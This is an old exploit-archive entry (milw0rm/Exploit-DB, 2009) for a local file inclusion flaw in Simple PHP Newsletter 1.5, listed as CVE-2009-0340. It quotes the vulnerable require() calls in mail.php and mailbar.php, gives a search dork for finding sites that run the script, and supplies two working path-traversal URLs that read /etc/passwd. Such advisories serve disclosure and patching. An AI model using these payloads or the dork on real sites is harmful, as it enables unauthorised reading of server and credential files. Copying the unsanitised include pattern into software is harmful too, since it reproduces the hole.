Simple PHP NewsLetter 1.5 - Local File Inclusion
Author: ahmadbady
type: webapps
platform: php
port:
date_added: 2009-01-15
date_updated: 2017-01-23
verified: 1
codes: OSVDB-51669;CVE-2009-0340;OSVDB-51668
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comsptn-1.5.zip
--:local file include:--
---------------------------------
script:Simple PHP Newsletter 1.5
----------------------------------------------
download from:http://quirm.net/download/23/
----------------------------------------------
...............................................
vul:/mail.php line 11:
if(isset($olang))
{
require("lang/".$olang); line 11
-------------------------------------------
vul:/mailbar.php line 5:
<?php
include("config.inc.php");
if(isset($olang))
{
require("lang/".$olang); line 5
-------------------------------------------
----------------------------------------------------
dork:"Powered by Simple PHP Text newsletter"
----------------------------------------------------
xpl:
http://127.0.0.1/path/mail.php?olang=../../../../../../etc/passwd
http://127.0.0.1/path/mailbar.php?olang=../../../../../../etc/passwd
***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
from:[iran]
---------------------------------------------------
# milw0rm.com [2009-01-16]